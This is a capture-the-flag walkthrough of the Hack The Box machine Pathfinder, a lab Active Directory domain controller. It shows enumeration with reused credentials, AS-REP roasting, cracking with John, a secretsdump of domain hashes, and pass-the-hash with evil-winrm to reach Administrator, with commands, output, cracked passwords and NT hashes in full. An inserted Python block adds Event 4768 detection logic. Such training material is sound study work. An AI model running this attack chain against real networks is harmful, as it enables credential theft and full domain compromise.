PathFinder

Difficulty : Very Easy
Operating System : Windows
Rating : 4.7
Author : egotisticalSW

Description

This machine is the fifth in the "Starting Point" set. For the intrusion we will use the credentials obtained on the previous machine, which will allow us to enumerate the Domain Controller properly. We will obtain a privileged user and from there escalate to Administrator.

Enumeration

For the basic enumeration we will use a tool I developed specifically for working with machines on the Hack The Box platform. The tool creates the working directory, runs a basic nmap scan and, if it finds a web service, launches a basic enumeration against it.

Download: HTBenum

Nmap

Nmap scan report for pathfinder.htb (10.10.10.30)
Host is up (0.060s latency).

PORT      STATE SERVICE       VERSION
53/tcp    open  domain?
| fingerprint-strings:
|   DNSVersionBindReqTCP:
|     version
|_    bind
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2021-08-06 20:43:41Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: MEGACORP.LOCAL0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: MEGACORP.LOCAL0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf        .NET Message Framing
47001/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open  msrpc         Microsoft Windows RPC
49665/tcp open  msrpc         Microsoft Windows RPC
49666/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
49671/tcp open  msrpc         Microsoft Windows RPC
49676/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49677/tcp open  msrpc         Microsoft Windows RPC
49683/tcp open  msrpc         Microsoft Windows RPC
49698/tcp open  msrpc         Microsoft Windows RPC
49718/tcp open  msrpc         Microsoft Windows RPC
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-TCP:V=7.70%I=7%D=8/6%Time=610D3AC1%P=x86_64-pc-linux-gnu%r(DNSVe
SF:rsionBindReqTCP,20,"\0\x1e\0\x06\x81\x04\0\x01\0\0\0\0\0\0\x07version\x
SF:04bind\0\0\x10\0\x03");
Service Info: Host: PATHFINDER; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 7h07m44s, deviation: 0s, median: 7h07m44s
| smb2-security-mode:
|   2.02:
|_    Message signing enabled and required
| smb2-time:
|   date: 2021-08-06 22:45:56
|_  start_date: N/A

To carry out the intrusion on this machine we already had a username and password found on the Shield machine:

sandra
Password1234!

We will use these credentials through the rpcenum utility, which is ultimately a wrapper around rpcclient. By default rpcenum is designed to use a NULL session, so I had to edit the script and put in the credentials we are going to use.

Download: rpcenum-pathfinder.sh

[root@htb pathfinder]# ./rpcenum-pathfinder.sh -e All -i 10.10.10.30

[*] Enumerating Domain Users...

+----------------+
| Users          |
+----------------+
| Administrator  |
| Guest          |
| krbtgt         |
| svc_bes        |
| sandra         |
+----------------+

[*] Listing domain users with description...

+----------------+-----------------------------------------------------------+
| User           | Description                                               |
+----------------+-----------------------------------------------------------+
| Administrator  | Built-in account for administering the computer/domain    |
| Guest          | Built-in account for guest access to the computer/domain  |
| krbtgt         | Key Distribution Center Service Account                   |
+----------------+-----------------------------------------------------------+

[*] Enumerating Domain Admin Users...

+-------------------+
| DomainAdminUsers  |
+-------------------+
| Administrator     |
+-------------------+

[*] Enumerating Domain Groups...

+------------------------------------------+-------------------------------------------------------------------------------------------------------------------+
| DomainGroup                              | Description                                                                                                       |
+------------------------------------------+-------------------------------------------------------------------------------------------------------------------+
| Enterprise Read-only Domain Controllers  | Members of this group are Read-Only Domain Controllers in the enterprise                                          |
| Domain Admins                            | Designated administrators of the domain                                                                           |
| Domain Users                             | All domain users                                                                                                  |
| Domain Guests                            | All domain guests                                                                                                 |
| Domain Computers                         | All workstations and servers joined to the domain                                                                 |
| Domain Controllers                       | All domain controllers in the domain                                                                              |
| Schema Admins                            | Designated administrators of the schema                                                                           |
| Enterprise Admins                        | Designated administrators of the enterprise                                                                       |
| Group Policy Creator Owners              | Members in this group can modify group policy for the domain                                                      |
| Read-only Domain Controllers             | Members of this group are Read-Only Domain Controllers in the domain                                              |
| Cloneable Domain Controllers             | Members of this group that are domain controllers may be cloned.                                                  |
| Protected Users                          | Members of this group are afforded additional protections against authentication security threats. See http       |
| Key Admins                               | Members of this group can perform administrative actions on key objects within the domain.                        |
| Enterprise Key Admins                    | Members of this group can perform administrative actions on key objects within the forest.                        |
| DnsUpdateProxy                           | DNS clients who are permitted to perform dynamic updates on behalf of some other clients (such as DHCP servers).  |
+------------------------------------------+-------------------------------------------------------------------------------------------------------------------+

User Own

Once we have the information from enumerating the domain controller, we save the usernames we obtained in a file called users.txt:

[root@htb pathfinder]# cat users.txt
Administrator
Guest
krbtgt
svc_bes
sandra

Now we will use the GetNPUsers.py tool from the Impacket suite, which will try to request a Ticket Granting Ticket (TGT) for the users that do not require Kerberos pre-authentication.

[root@htb pathfinder]# GetNPUsers.py -usersfile users.txt megacorp.local/ -no-pass -dc-ip 10.10.10.30
Impacket v0.9.23 - Copyright 2021 SecureAuth Corporation

[-] User Administrator doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
$krb5asrep$23$svc_bes@MEGACORP.LOCAL:0f894a838e6b185da0ad9056d55227ac$f25713089f992c9a151e4096b6cf94e7cf792c18b409a7e69db8deda5b3cc4ee192e11cf4a4f8f2713b9d4f2c0089ee06e79e59e94806787c92971db45949ca46025c060b9a07db73b3e95de66fc66265afbecc513c917a7fc125c2a90597d37114546caac60e059ae6d339b1be6608f3079c11a34e9e6a8041f80d7d4f32ce29a4bb3dfc867c1b936660fc51d81ef609228187bd094f22a577dca6f8d5a504f14263d4e9e337006205374b5e2a025117f4c8c80964dd93c20d18984fc1251987cfff2f699895211198769a89353607cecac83818e8f33b5ae400e3d5298008405a064a8e95c4d124913e8d30e88bb13
[-] User sandra doesn't have UF_DONT_REQUIRE_PREAUTH set

Once we have the ticket, we can store it in a file and crack it with John the Ripper:

[root@htb pathfinder]# cat token.txt
$krb5asrep$23$svc_bes@MEGACORP.LOCAL:00c4e7b0ce1ad503425a4b0161021fe5$8d8d475c06d1fb191d431055f3dc5cf63e22ebcbb6cdf4a7cb122e8f16374f221327e13be255eb60df449969b864abf3322c2c69c16738b9cbbd47ff1a67727656d7c7581c0df55280d19d4553c92fe86fb313fd7fb843bd2e7796183d005edf241d9c89917239f29834ce6595f7359911e427b21a16154e552536dd1e1c66280e240ee9ea6d9d7ca5c462c5abf9a57ca46db4af7c4a43b4261f5560257c58e6e1cc51ebe742dbeb903a7379ae7e2db8882018922feed8ae18ee799621de5f64bf0c10284e66a5017a2f6a13b0ff132e99e715ecded126bdbd6347dd93a0cfff96a586fb5682ce5e04b2960b67401854

[root@htb pathfinder]# john token.txt --wordlist=/opt/SecLists/Passwords/Leaked-Databases/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (krb5asrep, Kerberos 5 AS-REP etype 17/18/23 [MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 128/128 SSE2 4x])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
Sheffield19      ($krb5asrep$23$svc_bes@MEGACORP.LOCAL)
1g 0:00:00:12 DONE (2021-08-07 15:26) 0.07930g/s 840841p/s 840841c/s 840841C/s Sherbear27..Sheepy01
Use the "--show" option to display all of the cracked passwords reliably
Session completed
svc_bes
Sheffield19
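As an added example (not part of this write-up), here is how a defender would spot the two things the GetNPUsers.py run above does on the domain controller: the sweep of TGT requests for every name in users.txt, and the single AS-REP issued without pre-authentication and with RC4 (etype 23, the $krb5asrep$23$ prefix above). The records are constructed Windows Security Event 4768 entries; the source address 10.10.14.5 is assumed.

```python
# Added example, not from the original write-up: detection logic for the
# AS-REP roasting step above, run over constructed Windows Security
# Event 4768 records (Kerberos TGT requests) as a SIEM rule would see them.
from collections import defaultdict

RC4_HMAC = 0x17                 # etype 23, the "$krb5asrep$23$" in the hash above
KDC_ERR_CLIENT_REVOKED = 0x12   # the "credentials have been revoked" lines (disabled accounts)
KDC_ERR_PREAUTH_REQUIRED = 0x19 # the "doesn't have UF_DONT_REQUIRE_PREAUTH set" lines

# Constructed sample records mirroring the page's GetNPUsers.py run.
# Field names follow Event 4768's audit data; ts is seconds since epoch.
# 10.10.14.5 is an assumed attacker address, 10.10.10.40 an assumed workstation.
EVENTS_4768 = [
    {"ts": 100, "account": "Administrator", "ip": "10.10.14.5", "preauth": 0, "etype": RC4_HMAC, "status": KDC_ERR_PREAUTH_REQUIRED},
    {"ts": 100, "account": "Guest",   "ip": "10.10.14.5", "preauth": 0, "etype": RC4_HMAC, "status": KDC_ERR_CLIENT_REVOKED},
    {"ts": 100, "account": "krbtgt",  "ip": "10.10.14.5", "preauth": 0, "etype": RC4_HMAC, "status": KDC_ERR_CLIENT_REVOKED},
    {"ts": 101, "account": "svc_bes", "ip": "10.10.14.5", "preauth": 0, "etype": RC4_HMAC, "status": 0x0},
    {"ts": 101, "account": "sandra",  "ip": "10.10.14.5", "preauth": 0, "etype": RC4_HMAC, "status": KDC_ERR_PREAUTH_REQUIRED},
    # Normal logon from a workstation: pre-auth type 2 (encrypted timestamp), AES256 etype.
    {"ts": 900, "account": "sandra",  "ip": "10.10.10.40", "preauth": 2, "etype": 0x12, "status": 0x0},
]

def detect_asrep_roast(events):
    """One finding per TGT issued with no pre-authentication and RC4 etype:
    that AS-REP carries offline-crackable material (the $krb5asrep$23$ hash)."""
    return [f"asrep_roast account={e['account']} src={e['ip']}"
            for e in events
            if e["preauth"] == 0 and e["status"] == 0 and e["etype"] == RC4_HMAC]

def detect_tgt_burst(events, min_accounts=4, window=60):
    """One finding per source that requests TGTs for many distinct accounts
    within `window` seconds, successful or not: the usersfile sweep above."""
    by_ip = defaultdict(list)
    for e in sorted(events, key=lambda e: e["ts"]):
        by_ip[e["ip"]].append(e)
    findings = []
    for ip, evs in by_ip.items():
        for i, first in enumerate(evs):
            names = {x["account"] for x in evs[i:] if x["ts"] - first["ts"] <= window}
            if len(names) >= min_accounts:
                findings.append(f"tgt_burst src={ip} accounts={len(names)}")
                break   # one finding per source is enough
    return findings

if __name__ == "__main__":
    for line in detect_asrep_roast(EVENTS_4768) + detect_tgt_burst(EVENTS_4768):
        print(line)
```

Event 4768 with Pre-Authentication Type 0, Result Code 0x0 and Ticket Encryption Type 0x17 is the AS-REP roasting signature. The fix on the account side is clearing the "Do not require Kerberos preauthentication" flag (UF_DONT_REQUIRE_PREAUTH) on svc_bes.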

With the new user and password we obtained, we will connect to the machine through Evil-WinRM:

[root@htb pathfinder]# evil-winrm -i 10.10.10.30 -u svc_bes -p 'Sheffield19'

Evil-WinRM shell v3.1

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\svc_bes\Documents> whoami
megacorp\svc_bes
*Evil-WinRM* PS C:\Users\svc_bes\Documents> cd ..
*Evil-WinRM* PS C:\Users\svc_bes> cd Desktop
*Evil-WinRM* PS C:\Users\svc_bes\Desktop> dir


    Directory: C:\Users\svc_bes\Desktop


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-ar---        2/25/2020   2:35 PM             32 user.txt


*Evil-WinRM* PS C:\Users\svc_bes\Desktop>
*Evil-WinRM* PS C:\Users\svc_bes\Desktop> whoami /all

USER INFORMATION
----------------

User Name        SID
================ ==============================================
megacorp\svc_bes S-1-5-21-1035856440-4137329016-3276773158-1104


GROUP INFORMATION
-----------------

Group Name                                 Type             SID          Attributes
========================================== ================ ============ ==================================================
Everyone                                   Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users            Alias            S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                              Alias            S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias            S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK                       Well-known group S-1-5-2      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users           Well-known group S-1-5-11     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization             Well-known group S-1-5-15     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication           Well-known group S-1-5-64-10  Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Mandatory Level     Label            S-1-16-8192


PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== =======
SeMachineAccountPrivilege     Add workstations to domain     Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled

Root Own

The previous user has permissions to view other users' hashes, so we will run impacket-secretsdump to try to obtain an administrator-level hash.

[root@htb pathfinder]# impacket-secretsdump -just-dc-ntlm MEGACORP.local/svc_bes:Sheffield19@10.10.10.30
Impacket v0.9.15 - Copyright 2002-2016 Core Security Technologies

[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:8a4b77d52b1845bfe949ed1b9643bb18:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:f9f700dbf7b492969aac5943dab22ff3:::
svc_bes:1104:aad3b435b51404eeaad3b435b51404ee:0d1ce37b8c9e5cf4dbd20f5b88d5baca:::
sandra:1105:aad3b435b51404eeaad3b435b51404ee:29ab86c5c4d2aab957763e5c1720486d:::
PATHFINDER$:1000:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[*] Cleaning up...

Finally, we will use Evil-WinRM again, this time to do pass-the-hash and connect to the Administrator account with the hash we obtained:

[root@htb pathfinder]# evil-winrm -i 10.10.10.30 -u Administrator -H 8a4b77d52b1845bfe949ed1b9643bb18

Evil-WinRM shell v3.1

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
megacorp\administrator
*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ..
*Evil-WinRM* PS C:\Users\Administrator> cd Desktop
*Evil-WinRM* PS C:\Users\Administrator\Desktop> dir


    Directory: C:\Users\Administrator\Desktop


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-ar---        2/25/2020   2:33 PM             32 root.txt


*Evil-WinRM* PS C:\Users\Administrator\Desktop>